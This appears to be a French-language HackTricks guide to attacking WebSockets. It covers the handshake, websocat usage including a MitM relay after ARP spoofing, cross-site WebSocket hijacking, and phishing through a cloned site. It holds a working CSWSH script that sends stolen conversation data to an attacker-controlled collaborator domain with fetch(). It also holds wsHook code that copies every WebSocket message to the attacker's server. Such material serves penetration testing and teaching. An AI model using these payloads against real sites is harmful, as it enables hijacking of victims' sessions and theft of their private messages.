14 KiB
Attaques WebSocket
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? Ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
- Découvrez The PEASS Family, notre collection exclusive de NFT
- Obtenez le swag officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.
Qu'est-ce que les WebSockets
Les connexions WebSocket sont initiées via HTTP et sont généralement durables. Les messages peuvent être envoyés dans les deux sens à tout moment et ne sont pas transactionnels. La connexion restera normalement ouverte et inactive jusqu'à ce que le client ou le serveur soit prêt à envoyer un message.
Les WebSockets sont particulièrement utiles dans les situations où une latence faible ou des messages initiés par le serveur sont nécessaires, comme les flux en temps réel de données financières.
Comment les connexions WebSocket sont-elles établies ?
(Ici, vous trouverez un résumé, mais un guide plus détaillé sur la création d'une connexion WebSocket peut être trouvé ici).
Les connexions WebSocket sont généralement créées à l'aide de JavaScript côté client, comme dans l'exemple suivant :
var ws = new WebSocket("wss://normal-website.com/ws");
Le protocole wss
établit une connexion WebSocket via une connexion TLS chiffrée, tandis que le protocole ws
utilise une connexion non chiffrée.
Pour établir la connexion, le navigateur et le serveur effectuent une poignée de main WebSocket via HTTP. Le navigateur envoie une demande de poignée de main WebSocket comme suit :
GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket
Si le serveur accepte la connexion, il renvoie une réponse de poignée de main WebSocket comme suit :
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
À ce stade, la connexion réseau reste ouverte et peut être utilisée pour envoyer des messages WebSocket dans les deux sens.
Note
Plusieurs caractéristiques des messages de poignée de main WebSocket méritent d'être notées :
- Les en-têtes
Connection
etUpgrade
dans la requête et la réponse indiquent qu'il s'agit d'une poignée de main WebSocket. - L'en-tête de requête
Sec-WebSocket-Version
spécifie la version du protocole WebSocket que le client souhaite utiliser. C'est généralement13
. - L'en-tête de requête
Sec-WebSocket-Key
contient une valeur aléatoire encodée en Base64, qui doit être générée de manière aléatoire dans chaque requête de poignée de main. - L'en-tête de réponse
Sec-WebSocket-Accept
contient un hachage de la valeur soumise dans l'en-tête de requêteSec-WebSocket-Key
, concaténée avec une chaîne spécifique définie dans la spécification du protocole. Cela est fait pour éviter les réponses trompeuses résultant de serveurs mal configurés ou de proxies de mise en cache.
L'en-tête Sec-WebSocket-Key
contient une valeur aléatoire pour éviter les erreurs des proxies de mise en cache et n'est pas utilisé à des fins d'authentification ou de gestion de session (Ce n'est pas un jeton CSRF).
Console Linux
Vous pouvez utiliser websocat
pour établir une connexion brute avec un websocket.
websocat --insecure wss://10.10.10.10:8000 -v
Ou pour créer un serveur websocat :
websocat -s 0.0.0.0:8000 #Listen in port 8000
Attaques de MitM sur les connexions websocket
Si vous constatez que des clients sont connectés à un websocket HTTP depuis votre réseau local actuel, vous pouvez essayer une attaque d'ARP Spoofing pour effectuer une attaque de MitM entre le client et le serveur.
Une fois que le client essaie de se connecter, vous pouvez ensuite utiliser :
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
Énumération des Websockets
Vous pouvez utiliser l'outil https://github.com/PalindromeLabs/STEWS pour découvrir, identifier et rechercher automatiquement des vulnérabilités connues dans les websockets.
Outils de débogage des Websockets
- Burp Suite prend en charge la communication MitM des websockets de la même manière qu'elle le fait pour la communication HTTP classique.
- L'extension socketsleuth de Burp Suite vous permettra de mieux gérer les communications Websocket dans Burp en obtenant l'historique, en définissant des règles d'interception, en utilisant des règles de correspondance et de remplacement, en utilisant Intruder et AutoRepeater.
- WSSiP: Abréviation de "WebSocket/Socket.io Proxy", cet outil, écrit en Node.js, fournit une interface utilisateur pour capturer, intercepter, envoyer des messages personnalisés et afficher toutes les communications WebSocket et Socket.IO entre le client et le serveur.
- wsrepl est un REPL interactif pour les websockets conçu spécifiquement pour les tests de pénétration. Il fournit une interface pour observer les messages websocket entrants et en envoyer de nouveaux, avec un framework facile à utiliser pour automatiser cette communication.
- https://websocketking.com/ est un site web pour communiquer avec d'autres sites web en utilisant des websockets.
- https://hoppscotch.io/realtime/websocket parmi d'autres types de communications/protocoles, il fournit un site web pour communiquer avec d'autres sites web en utilisant des websockets.
Laboratoire Websocket
Dans Burp-Suite-Extender-Montoya-Course, vous trouverez un code pour lancer un site web utilisant des websockets et dans cet article, vous trouverez une explication.
Détournement de WebSocket inter-sites (CSWSH)
Également connu sous le nom de détournement de WebSocket inter-origines.
Il s'agit d'une Cross-Site Request Forgery (CSRF) sur un handshake WebSocket.
Cela se produit lorsque la demande de handshake WebSocket repose uniquement sur les cookies HTTP pour la gestion de session et ne contient aucun jeton CSRF ou autre valeur imprévisible.
Un attaquant peut créer une page web malveillante sur son propre domaine qui établit une connexion WebSocket inter-sites avec l'application vulnérable. L'application gérera la connexion dans le contexte de la session de l'utilisateur victime avec l'application.
Attaque simple
Notez que lors de l'établissement d'une connexion websocket, le cookie est envoyé au serveur. Le serveur peut l'utiliser pour associer chaque utilisateur spécifique à sa session websocket basée sur le cookie envoyé.
Ainsi, si par exemple le serveur websocket renvoie l'historique de la conversation d'un utilisateur si un message avec "READY" est envoyé, alors une simple XSS établissant la connexion (le cookie sera envoyé automatiquement pour autoriser l'utilisateur victime) en envoyant "READY" pourra récupérer l'historique de la conversation.
<script>
websocket = new WebSocket('wss://your-websocket-URL')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
websocket.send("READY"); //Send the message to retreive confidential information
}
function handleReply(event) {
//Exfiltrate the confidential information to attackers server
fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
}
</script>
Cross Origin + Cookie avec un sous-domaine différent
Dans cet article de blog https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/, l'attaquant a réussi à exécuter du code JavaScript arbitraire dans un sous-domaine du domaine où la communication du websocket avait lieu. Étant donné que c'était un sous-domaine, le cookie était envoyé, et parce que le Websocket ne vérifiait pas correctement l'Origine, il était possible de communiquer avec lui et de voler des jetons.
Vol de données utilisateur
Copiez l'application web que vous souhaitez usurper (les fichiers .html par exemple) et ajoutez ce code à l'intérieur du script où la communication du websocket a lieu :
//This is the script tag to load the websocket hooker
<script src='wsHook.js'></script>
//These are the functions that are gonig to be executed before a message
//is sent by the client or received from the server
//These code must be between some <script> tags or inside a .js file
wsHook.before = function(data, url) {
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "client_msg?m="+data, true);
xhttp.send();
}
wsHook.after = function(messageEvent, url, wsObject) {
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "server_msg?m="+messageEvent.data, true);
xhttp.send();
return messageEvent;
}
Maintenant, téléchargez le fichier wsHook.js
depuis https://github.com/skepticfx/wshook et enregistrez-le dans le dossier contenant les fichiers web.
En exposant l'application web et en faisant en sorte qu'un utilisateur s'y connecte, vous pourrez voler les messages envoyés et reçus via websocket :
sudo python3 -m http.server 80
Conditions de concurrence
Les conditions de concurrence dans les WebSockets sont également un problème, consultez ces informations pour en savoir plus.
Autres vulnérabilités
Étant donné que les WebSockets sont un mécanisme permettant d'envoyer des données côté serveur et côté client, en fonction de la manière dont le serveur et le client traitent les informations, les WebSockets peuvent être utilisés pour exploiter plusieurs autres vulnérabilités telles que XSS, SQLi ou toute autre vulnérabilité web courante en utilisant les entrées d'un utilisateur provenant d'un WebSocket.
WebSocket Smuggling
Cette vulnérabilité pourrait vous permettre de contourner les restrictions des serveurs mandataires inverses en les amenant à croire qu'une communication WebSocket a été établie (même si ce n'est pas vrai). Cela pourrait permettre à un attaquant d'accéder à des points de terminaison cachés. Pour plus d'informations, consultez la page suivante :
{% content-ref url="h2c-smuggling.md" %} h2c-smuggling.md {% endcontent-ref %}
Références
{% embed url="https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? Ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
- Découvrez The PEASS Family, notre collection exclusive de NFT
- Obtenez le swag officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.